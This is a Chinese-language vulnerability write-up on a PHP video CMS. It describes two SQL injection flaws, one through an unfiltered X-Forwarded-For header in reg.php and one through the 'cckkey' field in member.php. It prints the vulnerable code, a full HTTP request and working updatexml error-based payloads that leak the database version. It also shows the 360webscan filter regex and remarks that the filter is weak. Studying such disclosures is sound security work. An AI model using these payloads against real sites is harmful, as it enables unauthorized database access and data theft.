1.全局的ip获取做了正则，但是某个文件里的获取ip却重新写了，已经醉了 出现在注册那里reg.php

if ($HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"]) { 
    $ip = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"]; 
} elseif ($HTTP_SERVER_VARS["HTTP_CLIENT_IP"]) { 
    $ip = $HTTP_SERVER_VARS["HTTP_CLIENT_IP"]; 
} elseif ($HTTP_SERVER_VARS["REMOTE_ADDR"]) { 
    $ip = $HTTP_SERVER_VARS["REMOTE_ADDR"]; 
} elseif (getenv("HTTP_X_FORWARDED_FOR")) { 
    $ip = getenv("HTTP_X_FORWARDED_FOR"); 
} elseif (getenv("HTTP_CLIENT_IP")) { 
    $ip = getenv("HTTP_CLIENT_IP"); 
} elseif (getenv("REMOTE_ADDR")) { 
    $ip = getenv("REMOTE_ADDR"); 
} else { 
    $ip = "Unknown"; 
} if($username) { 
    $dsql->ExecuteNoneQuery("INSERT INTO `sea_member`(id,username,password,email,regtime,regip,state,gid,points,logincount) VALUES ('','$username','$pwd','$email','$dtime','$ip','1','2','0','1')"); 
    ShowMsg('恭喜您，注册成功！','login.php',0,3000); 
    exit; 
}

可以看到ip无过滤被带入insert了

POST /upload/reg.php?action=reg HTTP/1.1 
Host: 192.168.31.148 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.31.148/upload/reg.php 
Cookie: ECS[visit_times]=3; PHPSESSID=ol8cjjun6vr0l80bhad20fj2g2 
X-Forwarded-For: 1.1.1.1' or updatexml(1,concat(0x7e,(version())),0) or ' 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 68 

m_user=aaaaaa&m_pwd=123456&m_pwd2=123456&email=1111aaaaaas%40qq.coam

由于没有cloudeye我就没用dns获取返回数据了 直接截图看下执行监控吧

2016/3/19 19:57 INSERT INTO `sea_member`(id,username,password,email,regtime,regip,state,gid,points,logincount) VALUES ('','aaaaaa','c3949ba59abbe56e057f','1111aaaaaas@qq.coam','1458388670','1.1.1.1' or updatexml(1,concat(0x7e,(version())),0) or '','1','2','0','1')

可以看到闭合了单引号

2.首先需要登陆 然后漏洞出现在member.php中

} elseif($action=='cz') { 
    $key=$_POST['cckkey']; 
    if($key==""){ 
        showMsg("没有输入充值卡号","-1"); 
        exit; 
    } 
    $sqlt="SELECT * FROM sea_cck where ckey='$key'"; 
    $row1 = $dsql->GetOne($sqlt); 
    if(!is_array($row1) OR $row1['status']<>0){ 
        showMsg("充值卡不正确或已被使用","-1"); 
        exit; 
    }else{ 
        $uname=$_SESSION['sea_user_name']; 
        $points=$row1['climit']; 
        $dsql->executeNoneQuery("UPDATE sea_cck SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'"); 
        $dsql->executeNoneQuery("UPDATE sea_member SET points=points+$points WHERE username='$uname'"); 
        showMsg("恭喜！充值成功！","member.php?action=cc"); 
        exit; 
    }

key被带入select语句，全局没有过滤，这里也没有所以可以注入了 看到360webscan

$postfilter = "<.*=(&#\\d+?;?)+?>|<.*data=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|\\b(group_)?concat[\\s\\/\\*]*?\\([^\\)]+?\\)|\bcase[\s\/\*]*?when[\s\/\*]*?\([^\)]+?\)|load_file\s*?\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)|UPDATE\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|(`|'|\").*?(`|'|\"))FROM(\\(.+\\)|\\s+?.+?|(`|'|\").*?(`|'|\"))|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";

过滤不太严 最后exp如下

aaaa0' or updatexml(1,concat(0x7e,(version())),0) or '

访问

http://192.168.31.148/upload/member.php?action=cz post：cckkey=aaaa0' or updatexml(1,concat(0x7e,(version())),0) or '

直接爆出数据库版本